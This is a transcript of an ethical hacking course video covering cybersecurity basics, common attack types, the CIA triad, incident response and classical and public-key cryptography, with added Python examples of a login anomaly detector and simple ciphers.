
Hi guys, my name is Aarya and I'm going to be your instructor for this course today. So in this Ethical Hacking full course video, we'll be learning almost everything that is required for you to get started as an ethical hacker. So come, let's quickly go over the topics that we are going to be covering today.

Firstly, we're going to go through the basics of cyber security and cryptography, where we'll be learning the key concepts of confidentiality, integrity and availability, and how the cryptography concepts also tie into the whole picture. Next, we'll be looking at some cyber threats. We'll be seeing how the cyber threats actually affect our computer, and then we will also see how we can mitigate them. After which we will be looking into the history of ethical hacking. We'll learn how this all began in the Massachusetts Institute of Technology. And then we will be looking into the fundamentals of networking and ethical hacking; in this we'll be learning the various tools that are used in ethical hacking and also the network architectures these tools are used in.

After this, we will be having a look into the most famous operating system that is there, that is Kali Linux. Kali Linux is used by ethical hackers and penetration testers all around the world. We'll be learning how to install this on our local systems, we'll be learning the tools that come along with it, and how we should be using them. After that, we'll be learning about penetration testing, and penetration testing is a subset of ethical hacking. So in this we will be learning about a tool called Metasploit, and using Metasploit we'll be learning more about vulnerability analysis and how we can install backdoors in different computer systems and take advantage of these vulnerabilities. Now, Nmap is also another tool that we are going to be discussing in this course; we will be learning how we can use Nmap to gather information from our networks and how we can use this information to our advantage.

After that, we'll be learning deeply about three cyber attacks that are there in this industry: first is cross-site scripting, secondly distributed denial of service, and thirdly SQL injection attacks. Now we'll be doing these attacks ourselves on dummy targets and learning more about these attacks and how they are orchestrated, and thus we will be learning more about how we can mitigate them if we actually become ethical hackers. Now, we will also be discussing some very advanced cryptography methods called steganography, which is basically used for hiding digital code inside images. Last but not the least, we will also be discussing how you could become an ethical hacker yourself. So we'll be discussing a roadmap; we'll also be discussing the job profiles that are there in the industry, and we will also be discussing the companies that are hiring for these job profiles, along with the salaries that they are trying to offer. Also, we won't be leaving you hanging right there: we'll also be discussing the 50 most common interview questions that come along with these job profiles, so that you can snag that job interview. And if you do like our content in the end, please leave us a like, please leave a comment if you want to, and do hit the subscribe button so that you can join our ever-growing community of learners.

It can be rightfully said that today's generation lives on the internet, and we, the general users, are almost ignorant as to how those random bits of ones and zeros reach our computer securely. It's not magic; it's work and sweat that makes sure that your packets reach you unsniffed. Today I'm Aarya from Edureka, and I'm here to tell you guys about how cybersecurity makes this all possible. Now, before we begin, let me brief you all about the topics that we're going to cover today. So basically we're going to ask three questions that are important to cybersecurity. Firstly, we're going to see why cyber security is needed; next we're going to see what exactly cyber security is; and in the end I'm also going to show you a scenario of how cybersecurity can save a whole organization from organized cybercrime. Okay, so let's get started.

Now, as I just said, we are living in a digital era. Whether it be booking a hotel room, ordering some dinner or even booking a cab, we're constantly using the internet and inherently constantly generating data. This data is generally stored on the cloud, which is basically a huge data server or data center that you can access online. Also, we use an array of devices to access this data. Now, for a hacker, it's a golden age: with so many access points, public IP addresses, constant traffic and tons of data to exploit, black hat hackers are having one hell of a time exploiting vulnerabilities and creating malicious software for the same. Above that, cyber attacks are evolving by the day; hackers are becoming smarter and more creative with their malware, and how they bypass virus scans and firewalls still baffles many people.

Let's go through some of the most common types of cyber attacks now. So as you guys can see, I've listed out eight cyber attacks that have plagued us since the beginning of the internet. Let's go through them briefly.

So first on the list, we have general malware. Malware is an all-encompassing term for a variety of cyber threats including Trojans, viruses and worms. Malware is simply defined as code with malicious intent that typically steals data or destroys something on the computer.

Next on the list, we have phishing. Often posing as a request for data from a trusted third party, phishing attacks are sent via email and ask users to click on a link and enter their personal data. Phishing emails have gotten much more sophisticated in recent years, making it difficult for some people to discern a legitimate request for information from a false one. Phishing emails often fall into the same category as spam, but are more harmful than just a simple ad.

Next on the list, we have password attacks. A password attack is exactly what it sounds like: a third party trying to gain access to your system by cracking a user's password.

Next up is DDoS, which stands for distributed denial-of-service. A DDoS attack focuses on disrupting the service of a network. An attacker sends high volumes of data or traffic through the network, that is, making a lot of connection requests, until the network becomes overloaded and can no longer function.

Next up, we have man-in-the-middle attacks. By impersonating the endpoint in an online information exchange, that is, the connection from your smartphone to a website, the MITM attacker can obtain information from the end user and the entity he or she is communicating with. For example, if you're banking online, the man in the middle would communicate with you by impersonating your bank, and communicate with the bank by impersonating you. The man in the middle would then receive all the information transferred between both parties, which could include sensitive data such as bank accounts and personal information.

Next up, we have drive-by downloads. Through malware on a legitimate website, a program is downloaded to a user's system just by visiting the site. It doesn't require any type of action by the user to download it, actually.

Next up, we have malvertising, which is a way to compromise your computer with malicious code that is downloaded to your system when you click on an infected ad.

Lastly, we have rogue software, which is basically malware masquerading as legitimate and necessary security software that will keep your system safe.

So as you guys can see now, the internet sure isn't the safe place you might think it is. This not only applies to us as individuals, but also to large organizations. They have had multiple cyber breaches in the past that have compromised the privacy and confidentiality of their data. If we head over to the site called Information is Beautiful, we can see all the major cyber breaches that have been committed. So as you guys can see, even big companies like eBay, AOL, Evernote and Adobe have actually gone through major cyber breaches, even though they have a lot of security measures taken to protect the data that they contain. So it's not only that small individuals are targeted by hackers and other people, but even bigger organizations are constantly being targeted by these guys.

So after looking at all sorts of cyberattacks possible, the breaches of the past and the sheer amount of data available, we must be thinking that there must be some sort of mechanism and protocol to actually protect us from all these sorts of cyberattacks. And indeed there is a way, and this is called cyber security. In a computing context, security comprises cybersecurity and physical security. Both are used by enterprises to protect against unauthorized access to data centers and other computerized systems. Information security, which is designed to maintain the confidentiality, integrity and availability of data, is a subset of cybersecurity. The use of cybersecurity can help prevent cyberattacks, data breaches and identity theft, and can aid in risk management. So when an organization has a strong sense of network security and an effective incident response plan, it is better able to prevent and mitigate these attacks. For example, end user protection defends information and guards against loss or theft, while also scanning computers for malicious code.

Now, when talking about cybersecurity, there are three main activities that we are trying to protect ourselves against, and they are unauthorized modification, unauthorized deletion and unauthorized access. These three are very synonymous with the very commonly known CIA triad, which stands for confidentiality, integrity and availability. The CIA triad is also commonly referred to as the three pillars of security, and most security policies of bigger organizations, and even smaller companies, are based on these three principles. So let's go through them one by one.

So first on the list we have confidentiality. Confidentiality is roughly equivalent to privacy. Measures undertaken to ensure confidentiality are designed to prevent sensitive information from reaching the wrong people, while making sure that the right people can in fact get it. Access must be restricted to those authorized to view the data in question. It is common, as well, for data to be categorized according to the amount and type of damage that could be done should it fall into unintended hands. More or less stringent measures can then be implemented according to those categories. Sometimes safeguarding data confidentiality may involve special training for those privy to such documents. Such training would typically include the security risks that could threaten this information. Training can help familiarize authorized people with risk factors and how to guard against them. Further aspects of training can include strong passwords and password-related best practices, and information about social engineering methods, to prevent them from bending data handling rules with good intentions and potentially disastrous results.

Next on the list, we have integrity. Integrity involves maintaining the consistency, accuracy and trustworthiness of data over its entire lifecycle. Data must not be changed in transit, and steps must be taken to ensure that data cannot be altered by unauthorized people (for example, in a breach of confidentiality). These measures include file permissions and user access controls. Version control may be used to prevent erroneous changes or accidental deletion by authorized users from becoming a problem. In addition, some means must be in place to detect any changes in data that might occur as a result of non-human-caused events such as electromagnetic pulses or server crashes. Some data might include checksums, even cryptographic checksums, for verification of integrity. Backups or redundancies must be available to restore the affected data to its correct state.

Last but not least is availability. Availability is best ensured by rigorously maintaining all hardware, performing hardware repairs immediately when needed, and maintaining a correctly functioning operating system environment that is free of software conflicts. It's also important to keep current with all necessary system upgrades. Providing adequate communication bandwidth and preventing the occurrence of bottlenecks are equally important. Redundancy, failover and even high-availability clusters can mitigate serious consequences when hardware issues do occur. Fast and adaptive disaster recovery is essential for the worst-case scenarios; that capacity is reliant on the existence of a comprehensive disaster recovery plan. Safeguards against data loss or interruption in connection must include unpredictable events such as natural disasters and fire. To prevent data loss from such occurrences, a backup copy must be stored in a geographically isolated location, perhaps even in a fireproof, waterproof safe. Extra security equipment or software such as firewalls and proxy servers can guard against downtime and unreachable data due to malicious actions such as denial-of-service attacks and network intrusions.

So now that we have seen what we are actually trying to implement when trying to protect ourselves on the internet, we should also know the ways in which we actually protect ourselves when we are attacked by cyber organizations. So the first step to actually mitigate any type of cyber attack is to identify the malware or the cyber threat that is currently going on in your organization. Next, we have to actually analyze and evaluate all the affected parties and the file systems that have been compromised. And in the end we have to patch the whole thing, so that our organization can come back to its original running state without any cyber breaches.

So how is it exactly done? This is mostly done by actually calculating three factors. The first factor is vulnerability, the second factor is threat, and the third is risk. So let me tell you about the three of them a little bit.

So first on the list of actual calculation we have vulnerability. So a vulnerability refers to a known weakness of an asset that can be exploited by one or more attackers. In other words, it is a known issue that allows an attack to be successful. For example, when a team member resigns and you forget to disable their access to external accounts, change logins or remove their names from the company credit cards, this leaves your business open to both unintentional and intentional threats. However, most vulnerabilities are exploited by automated attackers and not a human typing on the other side of the network. Next, testing for vulnerabilities is critical to ensuring the continued security of your systems, by identifying weak points and developing a strategy to respond quickly. Here are some questions that you ask when determining your security vulnerabilities. So you have questions like: is your data backed up and stored in a secure off-site location? Is your data stored in the cloud? If yes, how exactly is it being protected from cloud vulnerabilities? What kind of security do you have to determine who can access, modify or delete information from within your organization? Next, you could ask questions like: what kind of antivirus protection is in use? Is the license current? And is it running as often as needed? Also, do you have a data recovery plan in the event of a vulnerability being exploited? These are the normal questions that one asks when actually checking their vulnerability.

Next up is threat. A threat refers to a new or newly discovered incident with the potential to do harm to a system or your overall organization. There are three main types of threat: natural threats like floods or tornadoes, unintentional threats such as an employee mistakenly accessing the wrong information, and intentional threats. There are many examples of intentional threats, including spyware, malware, adware companies or the actions of disgruntled employees. In addition, worms and viruses are categorized as threats because they could potentially cause harm to your organization through exposure to an automated attack, as opposed to one perpetrated by human beings. Although these threats are generally outside of one's control and difficult to identify in advance, it is essential to take appropriate measures to assess threats regularly. Here are some ways to do so. Ensure that your team members are staying informed of current trends in cyber security so they can quickly identify new threats. They should subscribe to blogs like Wired and podcasts like the TechGenix Extreme IT that cover these issues, as well as join professional associations, so they can benefit from breaking news feeds, conferences and webinars. You should also perform regular threat assessments to determine the best approaches to protecting a system against a specific threat, along with assessing different types of threat. In addition, penetration testing involves modeling real-world threats in order to discover vulnerabilities.
Next on the list, we have risk. So risk refers to the potential for loss or damage when a threat exploits a vulnerability. Examples of risks include financial losses as a result of business disruption, loss of privacy, reputational damage, legal implications, and can even include loss of life. Risk can also be defined as follows, which is basically threat times vulnerability. You can reduce the potential for risk by creating and implementing a risk management plan. And here are the key aspects to consider when developing your risk management strategy. Firstly, we need to assess risk and determine needs. When it comes to designing and implementing a risk assessment framework, it is critical to prioritize the most important breaches that need to be addressed. Although the frequency may differ in each organization, this level of assessment must be done on a regular, recurring basis. Next, we also have to include a total stakeholder perspective. Stakeholders include the business owners as well as employees, customers and even vendors. All of these players have the potential to negatively impact the organization, but at the same time they can be assets in helping to mitigate risk. So as we see, risk management is the key to cybersecurity.

So now let's go through a scenario to actually understand how cybersecurity actually defends an organization against very manipulative cybercrime. So cybercrime, as we all know, is a global problem that's been dominating the news cycle. It poses a threat to individual security and an even bigger threat to large international companies, banks and governments. Today's organized cybercrime has far outpaced the lone hackers of the past, and now large organized crime rings function like startups and often employ highly trained developers who are constantly innovating new online attacks. Most companies have preventative security software to stop these types of attacks, but no matter how secure we are, cybercrime is going to happen.

So meet Bob. He's the chief security officer for a company that makes a mobile app to help customers track and manage their finances, so security is a top priority. So Bob's company has an incident response platform in place that automates the entire cybersecurity process. The IRP software integrates all the security and IT software needed to keep a large company like Bob's secured into a single dashboard, and acts as a hub for the people, processes and technology needed to respond to and contain cyber attacks. Let's see how this platform works in the case of a security breach.

While Bob is out on a business trip, irregular activity occurs on his account. A user behavior analytics engine that monitors account activity recognizes suspicious behavior involving late-night logins and unusual amounts of data being downloaded. This piece of software is the first signal that something is wrong, and an alert is sent to the next piece of software in the chain, which is the security information and event management system. Now the IRP can orchestrate a chain of events that ultimately prevents the company from encountering a serious security disaster. The IRP connects to the user directory software that Bob's company uses, which immediately recognizes that the user account belongs to an executive who is out on a business trip, and then proceeds to lock his account. The IRP sends the incident's IP address to threat intelligence software, which identifies the address as a suspected malware server. As each piece of security software runs, the findings are recorded in the IRP's incident, which is already busy creating a set of instructions called a playbook for a security analyst to follow. The analyst unlocks Bob's account and changes his passwords. This time, the software has determined that the attempted attack came from a well-known cybercrime organization using stolen credentials. Bob's credentials were stolen when the hacker found a vulnerability in his company's firewall software and used it to upload a malware-infected file.

Now that we know how the attack happened, the analyst uses the IRP and identifies and patches all the things. The IRP uses information from the endpoint tool to determine which machines need to be patched, recommends how to patch them, and then allows the analyst to push the patches to all the computers and mobile devices instantly. Meanwhile, Bob has to alert the legal department of the breach, and the IRP instantly notifies the correct people of the situation and the status of the incident. After the attack is contained and Bob's account is secured, the analyst communicates which data may have been stolen or compromised during the incident. He identifies which geographies, jurisdictions and regulatory agencies cover the users and information affected by the attack. Then the IRP creates a series of tasks so the organization can notify the affected parties and follow all relevant compliance and liability procedures.

In the past, a security breach this large would have required Bob's company to involve several agencies and third parties to solve the problem, a process that could have taken months or longer. But in a matter of hours, the incident response platform organized all of the people, processes and technology to identify and contain the problem, find the source of the attack, fix the vulnerability and notify all affected parties. And in the future, Bob and his team will be able to turn to cognitive security tools. These tools will read and learn from tens of thousands of trusted publications, blogs and other sources of information. This knowledge will uncover new insights and patterns, anticipate, isolate and minimize attacks as they happen, and immediately recommend actions for security professionals to take, keeping data safe and companies like Bob's out of the headlines.
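The two signals the narration credits to the user behavior analytics engine, late-night logins and an unusual volume of downloads, can be expressed as a simple rule over an audit log. The following is an added example written for this page, not the course's code or any vendor's product; the log format, the business-hours window, the baseline of three prior downloads and the z-score threshold are assumptions, and the log lines are constructed.

```python
"""Toy user-behaviour-analytics rule, modelled on the Bob scenario.

Flags (a) logins outside an assumed business-hours window and (b) downloads
whose size is far above the user's own historical baseline.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log lines: "<ISO timestamp> <user> <event> <bytes>".
# The last two lines are the "late-night login + large download" pattern.
SAMPLE_LOG = """\
2024-03-01T09:12:00 bob login 0
2024-03-01T09:40:00 bob download 1200000
2024-03-02T10:05:00 bob login 0
2024-03-02T11:30:00 bob download 900000
2024-03-03T08:55:00 bob login 0
2024-03-03T14:10:00 bob download 1500000
2024-03-04T02:47:00 bob login 0
2024-03-04T02:52:00 bob download 48000000
"""

BUSINESS_HOURS = range(7, 20)   # assumption: 07:00-19:59 is "normal"
MIN_HISTORY = 3                 # assumption: need 3 past downloads for a baseline


def parse_log(text):
    """Turn raw lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, user, event, size = parts
        try:
            events.append({"time": datetime.fromisoformat(ts),
                           "user": user, "event": event, "bytes": int(size)})
        except ValueError:
            continue
    return events


def detect_anomalies(events, z_threshold=2.0):
    """Return (timestamp, user, reason) alerts; events must be chronological."""
    alerts = []
    history = defaultdict(list)   # per-user sizes of earlier downloads
    for ev in events:
        if ev["event"] == "login" and ev["time"].hour not in BUSINESS_HOURS:
            alerts.append((ev["time"], ev["user"], "login outside business hours"))
        if ev["event"] == "download":
            past = history[ev["user"]]
            if len(past) >= MIN_HISTORY:
                mu, sigma = mean(past), pstdev(past)
                if sigma == 0:          # identical past sizes: avoid divide-by-zero
                    sigma = mu or 1
                if (ev["bytes"] - mu) / sigma > z_threshold:
                    alerts.append((ev["time"], ev["user"],
                                   "download volume far above baseline"))
            past.append(ev["bytes"])
    return alerts


def run_on_sample():
    """Run the rule over the constructed log; returns the list of alerts."""
    return detect_anomalies(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for when, who, why in run_on_sample():
        print(f"{when.isoformat()} {who}: {why}")
```

In a real deployment the baseline would be kept per user over a rolling window and the alerts forwarded to the SIEM, which is the hand-off the narration describes.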

Cryptography is essentially important because it allows you to securely protect data that you don't want anyone else to have access to. It is used to protect corporate secrets, secure classified information, and to protect personal information to guard against things like identity theft. And today's video is basically going to be about cryptography. Now, before we actually jump into the session, let me give you guys a brief on the topics that we're going to cover today. So first of all, we're going to cover what cryptography is through the help of a very simplistic scenario; then we are going to go through the classifications of cryptography and how the different classification algorithms work; and in the end, I'm going to show you guys a nifty demo on how a popular algorithm called RSA actually works. So let's get started.

Now, I'm going to take the help of an example or a scenario to actually explain what cryptography is. All right. So let's say we have a person, and let's call him Andy. Now suppose Andy sends a message to his friend Sam, who's on the other side of the world. Now, obviously he wants this message to be private and nobody else should have access to the message. Now, he uses a public forum, for example the internet, for sending this message. The goal is to actually secure this communication. And of course we have to be secured against someone. Now, let's say there is a smart guy called Eve who has secretly got access to your communication channel. Since this guy has access to your communication, he can do much more than just eavesdrop. For example, he can try to change the message itself. Now, this is just a small example. What if Eve actually gets access to your private information? Well, that could actually result in a big catastrophe. So how can Andy be sure that nobody in the middle could access the message sent to Sam? The goal here is to make communication secure, and that's where cryptography comes in.

So what exactly is cryptography? Well, cryptography is the practice and the study of techniques for securing communication and data in the presence of adversaries. So let me take a moment to explain how that actually happens. Well, first of all, we have a message. This message is firstly converted into a numeric form, and then this numeric form is applied with a key called an encryption key, and this encryption key is used in an encryption algorithm. So once the numeric message and the encryption key have been applied in an encryption algorithm, what we get is called a ciphertext. Now this ciphertext is sent over the network to the other side of the world, where the other person, whom the message is intended for, will actually use a decryption key and use the ciphertext as a parameter of a decryption algorithm. And then he'll get what we actually sent as a message, and if some error had actually occurred, he'd get an error.

So let's see how cryptography can help secure the connection between Andy and Sam. So to protect his message, Andy first converts his readable message to an unreadable form. Here he converts the message to some random numbers, and after that he uses a key to encrypt his message. After applying this key to the numerical form of his message, he gets a new value; in cryptography we call this ciphertext. So now if Andy sends the ciphertext, or encrypted message, over the communication channel, he won't have to worry about somebody in the middle discovering the private message. Even if somebody manages to discover the message, he won't be able to decrypt the message without having the proper key to unlock this message. So suppose Eve here discovers the message and he somehow manages to tamper with the message, and the message finally reaches Sam. Sam would need a key to decrypt the message to recover the original plaintext. So using the key, he would convert the ciphertext to the numerical value corresponding to the plaintext. Now, after using the key for decryption, what will come out is the original plaintext message or an error. Now, this error is very important. It is the way Sam knows that the message sent by Andy is not the same as the message that he received. So the error, in a sense, tells us that Eve has tampered with the message. Now, the important thing to note here is that in modern cryptography, the security of the system purely relies on keeping the encryption and decryption key secret.


Based on the type of keys and encryption algorithms, cryptography is classified under the following categories. Now, cryptography is broadly classified under two categories, namely symmetric key cryptography and asymmetric key cryptography, popularly also known as public key cryptography. Now, symmetric key cryptography is further classified as classical cryptography and modern cryptography. Further drilling down, classical cryptography is divided into two, which is transposition cipher and substitution cipher; on the other hand, modern cryptography is divided into stream cipher and block cipher. In the upcoming slides, I'll broadly explain all these types of cryptography.

So let's start with symmetric key cryptography first. So symmetric key algorithms are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical, or there may be some simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption in comparison to public key encryption, also known as asymmetric key encryption. Now, symmetric key cryptography is sometimes also called secret key cryptography, and the most popular symmetric key system is the Data Encryption Standard, which also stands for DES.

Next up, we're going to discuss transposition cipher. So in cryptography, a transposition cipher is a method of encryption by which the positions held by units of plaintext, which are commonly characters or groups of characters, are shifted according to a regular system, so that the ciphertext constitutes a permutation of the plaintext. That is, the order of units is changed; the plaintext is reordered. Now, mathematically speaking, a bijective function is used on the characters' positions to encrypt, and an inverse function to decrypt. So as you can see, there is an example on the slide. So on the plaintext side, we have a message which says "meet me after the party". Now, this has been carefully arranged in the encryption matrix, which has been divided into six rows and columns. So next we have a key, which is basically 4 2 1 6 5, and then we rearrange by looking at the plaintext matrix, and then we get the ciphertext, which basically is some unreadable gibberish at this moment. So that's how this whole algorithm works. On the other hand, when the ciphertext is being converted into the plaintext, the plaintext matrix is going to be referred to, and it can be done very easily.
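A columnar transposition of the kind shown on the slide, as an added example for this page (not the course's own code). It uses the slide's message "meet me after the party"; the key (4, 2, 1, 6, 5, 3), the row-wise fill of the matrix, reading the columns out in key order, and the null character used to pad the last row are all assumptions, since the transcript does not give the slide's key clearly.

```python
"""Columnar transposition: write the plaintext into a grid row by row, then
read the columns out in the order given by the key. Decryption refills the
columns in that order and reads the rows back. Only letters are used."""
import math

PLAINTEXT = "meet me after the party"   # message on the slide
KEY = (4, 2, 1, 6, 5, 3)                # assumed: column i is read out in position KEY[i]
NULL = "x"                              # assumed padding (null) character


def _normalise(text):
    """Keep only letters, lower-cased, so the grid layout is predictable."""
    return "".join(ch.lower() for ch in text if ch.isalpha())


def _read_order(key):
    """Column indexes in read-out order: the column labelled 1 first, then 2, ..."""
    if sorted(key) != list(range(1, len(key) + 1)):
        raise ValueError("key must be a permutation of 1..n")
    return sorted(range(len(key)), key=lambda i: key[i])


def encrypt(plaintext, key=KEY):
    text = _normalise(plaintext)
    cols = len(key)
    rows = math.ceil(len(text) / cols)
    text = text.ljust(rows * cols, NULL)                    # pad the last row
    grid = [text[r * cols:(r + 1) * cols] for r in range(rows)]
    # Read each column top to bottom, taking the columns in key order.
    return "".join(grid[r][c] for c in _read_order(key) for r in range(rows))


def decrypt(ciphertext, key=KEY):
    cols = len(key)
    if len(ciphertext) % cols:
        raise ValueError("ciphertext length is not a multiple of the key length")
    rows = len(ciphertext) // cols
    grid = [[""] * cols for _ in range(rows)]
    # Slice the ciphertext into columns and put each back in its original place.
    for pos, c in enumerate(_read_order(key)):
        column = ciphertext[pos * rows:(pos + 1) * rows]
        for r, ch in enumerate(column):
            grid[r][c] = ch
    # Trailing nulls are discarded; a genuine trailing 'x' would be lost too,
    # which is why real systems pick a null the plaintext cannot end with.
    return "".join("".join(row) for row in grid).rstrip(NULL)


if __name__ == "__main__":
    ct = encrypt(PLAINTEXT)
    print(ct)
    print(decrypt(ct))
```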

Moving on, we are going to discuss substitution cipher. So, substitution of single letters separately, simple substitution, can be demonstrated by writing out the alphabet in some order to represent the substitution. This is termed a substitution alphabet. The cipher alphabet may be shifted or reversed, creating the Caesar and Atbash ciphers respectively, or scrambled in a more complex fashion, in which case it is called a mixed alphabet or deranged alphabet. Traditionally, mixed alphabets may be created by first writing out a keyword, removing repeated letters in it, then writing all the remaining letters of the alphabet in the usual order. Now, consider this example shown on the slide. Using the system we just discussed, the keyword "zebras" gives us the following alphabet from the plaintext alphabet, which is A to Z. So the ciphertext alphabet is basically ZEBRAS, followed by all the letters we have missed out in the word zebras. So as you guys can see, it's ZEBRAS followed by C, D, F, G, H and so on. Now suppose we were to actually encrypt a message using this code. So as you guys can see on the screen, I've shown you an example, which is the message "flee at once. we are discovered" being actually encrypted using this code. So if you guys can see out here, the letter F actually corresponds to S, and then the letter L actually corresponds to I out here. Then we actually get the ciphertext, which is SIAA ZQ and so on, using the code and the process that I just discussed.

Now, traditionally, the ciphertext is written out in blocks of fixed length, omitting punctuation and spaces. This is done to help avoid transmission errors and to disguise the word boundaries from the plaintext. Now, these blocks are called groups, and sometimes a group count, that is the number of groups, is given as an additional check. Now, five-letter groups are traditional; as you guys can see, we have also divided our ciphertext into groups of five, and this dates back to when messages used to be transmitted by telegraph. Now, if the length of the message happens not to be divisible by 5, it may be padded at the end with nulls, and these can be any characters that decrypt to obvious nonsense, so the receiver can easily spot them and discard them.


our list is stream Cipher.
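The keyword alphabet, the Caesar and Atbash variants, and the five-letter groups with nulls and a group count, as an added example (not code from the course); it generalizes the ZEBRAS example above to any cipher alphabet.

```python
"""Monoalphabetic substitution ciphers and five-letter groups (added example)."""
import string
from typing import Optional, Tuple

ALPHABET = string.ascii_uppercase


def letters_only(text: str) -> str:
    return "".join(ch for ch in text.upper() if ch.isalpha())


def caesar_alphabet(shift: int) -> str:
    """Shifted alphabet (Caesar): shift=3 maps A->D."""
    return ALPHABET[shift % 26:] + ALPHABET[:shift % 26]


def atbash_alphabet() -> str:
    """Reversed alphabet (Atbash): A<->Z, B<->Y, ..."""
    return ALPHABET[::-1]


def keyword_alphabet(keyword: str) -> str:
    """Mixed (deranged) alphabet: the keyword with repeated letters removed,
    then every letter not in the keyword in the usual order."""
    out = []
    for ch in letters_only(keyword) + ALPHABET:
        if ch not in out:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext: str, cipher_alphabet: str) -> str:
    return letters_only(plaintext).translate(str.maketrans(ALPHABET, cipher_alphabet))


def decrypt(ciphertext: str, cipher_alphabet: str) -> str:
    return letters_only(ciphertext).translate(str.maketrans(cipher_alphabet, ALPHABET))


def to_groups(ciphertext: str, size: int = 5, null: str = "X") -> Tuple[str, int]:
    """Pad with nulls to a multiple of `size`, split into groups and return
    the grouped text together with the group count (the transmission check)."""
    padded = ciphertext + null * (-len(ciphertext) % size)
    groups = [padded[i:i + size] for i in range(0, len(padded), size)]
    return " ".join(groups), len(groups)


def from_groups(grouped: str, expected_count: Optional[int] = None) -> str:
    """Join groups back together, verifying the group count if one was sent."""
    groups = grouped.split()
    if expected_count is not None and len(groups) != expected_count:
        raise ValueError(f"group count {len(groups)} != expected {expected_count}")
    return "".join(groups)


if __name__ == "__main__":
    zebras = keyword_alphabet("zebras")       # ZEBRASCDFGHIJKLMNOPQTUVWXY
    ct = encrypt("flee at once. we are discovered", zebras)
    grouped, count = to_groups(ct)
    print(grouped, count)                    # SIAAZ QLKBA VAZOA RFPBL UAOAR 5
    # Nulls decrypt to nonsense the receiver discards: each trailing X -> Y here.
    print(decrypt(from_groups("SIAAZ QLXXX", 2), zebras))   # FLEEATOYYY
```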

Next on our list is the stream cipher. So a stream cipher is a method of encrypting text to produce ciphertext in which a cryptographic key and algorithm are applied to each binary digit in a data stream, one bit at a time. This method is not much used in modern cryptography. The main alternative method is the block cipher, in which a key and algorithm are applied to blocks of data rather than to individual bits in a stream.

Okay. So now that we've spoken about block ciphers, let's go and actually explain what a block cipher does. A block cipher is an encryption method that applies a deterministic algorithm with a symmetric key to encrypt a block of text, rather than encrypting one bit at a time as in stream ciphers. For example, a common block cipher, AES, encrypts 128-bit blocks with a key of predetermined length, that is either 128, 192 or 256 bits. Now block ciphers are pseudo-random permutation (PRP) families that operate on a fixed-size block of bits. These PRPs are functions that cannot be distinguished from a completely random permutation, and thus are considered reliable, although some have been shown to be unreliable by some sources.

Okay.

So now it's time that we discussed some asymmetric cryptography. Asymmetric cryptography, also known as public key cryptography, is any cryptography system that uses pairs of keys: a public key, which may be disseminated widely, and a private key, which is known only to the owner. This accomplishes two functions: authentication, where the public key verifies that a holder of the paired private key sent the message, and encryption, where only the paired private key holder can decrypt a message encrypted with the public key. In a public key encryption system, any person can encrypt a message using the receiver's public key; that encrypted message can only be decrypted with the receiver's private key. So to be practical, the generation of a public and private key pair must be computationally economical. The strength of a public key cryptography system relies on the computational effort required to find the private key from its paired public key. So effective security only requires keeping the private key private, and the public key can be openly distributed without compromising security.

Okay. So now that I've actually shown you guys how cryptography actually works and how the different classifications are actually applied, let's go and do something interesting. So you guys are actually watching this video on YouTube right now. So if you guys actually go and click on the "Secure" indicator beside the URL, you can actually go and view the digital certificates that are actually used out here. So click on certificates and you'll see the details in the Details tab. Now as you guys can see, the signature algorithm that is used for actually securing YouTube is SHA-256 with RSA, and RSA is a very, very common encryption algorithm that is used throughout the internet. Then the signature hash algorithm that is being used is SHA-256. And the issuer is Google Internet Authority, and you can get a lot of information about sites and all their authority key identifiers, certificate policies, key usage and a lot of things about security just from this small little button out here.

Also, let me show you a little of how public key encryption actually works. So on the site, which is basically cobweb.cs.uga.edu, you can actually demo public key encryption. So suppose we had to send a message. First we would need to generate keys. So as you can see, I just click generate keys and it got me two keys: one is the public key, which I will distribute over the network, and one is the private key, which I will actually keep secret to myself. Now I want to send a message saying "hi there, when is the exam tomorrow?" So now we are going to encrypt it using the public key, because that's exactly what's distributed. So now as you can see we have got our ciphertext. So this huge thing right out here is the ciphertext, and it absolutely makes no sense whatsoever. Now suppose we were to actually then decrypt the message: we would use the private key that goes along with our account and we would decode the message, and as you guys can see, voila, we have "hi there, when is the exam tomorrow?" So we have actually sent a message on the internet in a very secure fashion.

Above that, there's also RSA that needs some explaining, because I had promised that. Now RSA is a very, very commonly used algorithm that is used throughout the internet, and you just saw it being used by YouTube, so it has to be common. RSA has a very unique way of applying this algorithm. There are many actual parameters that you actually need to study.

Okay.

So now we're actually going to discuss RSA, which is a very popular algorithm that is used throughout the internet, and you also saw that it's being used by YouTube right now. So this cryptosystem is one of the initial systems, and it remains the most employed cryptosystem even today. The system was invented by three scholars, Ron Rivest, Adi Shamir and Len Adleman, hence the name RSA. We will see the two aspects of the RSA cryptosystem: firstly, generation of the key pair, and secondly, the encryption and decryption algorithms.

So each person or party who desires to participate in communication using encryption needs to generate a pair of keys, namely a public key and a private key. The process followed in the generation of keys is as follows. First, we have to actually calculate n. Now n is given by multiplying p and q, as you guys can see out here. So p and q are supposed to be very large prime numbers; out here n will be 35, but for some very strong encryption we are going to choose very large prime numbers. Then we actually have to calculate phi. As you can see, the formula goes phi = (p - 1)(q - 1), and this helps us determine e for the encryption algorithm. Then we have to actually calculate e. Now e must be greater than 1 and less than phi, which is (p - 1)(q - 1), and there must be no common factors for e and phi except for 1. In other words, they must be co-prime to each other. Now the pair of numbers (n, e) forms the public key of the RSA public key system. This is actually made public and is distributed throughout the network. Interestingly though, n is a part of the public key, and the difficulty in factorizing a large number ensures that the attacker cannot find, in finite time, the two primes p and q that are used to obtain n. This actually ensures the strength of RSA.

Now, in the generation of the private key: the private key d is calculated from p, q and e. For given n and e, there is a unique number d. The number d is the inverse of e modulo phi. This means that d is a number less than phi such that when multiplied by e, it gives 1 (modulo phi).

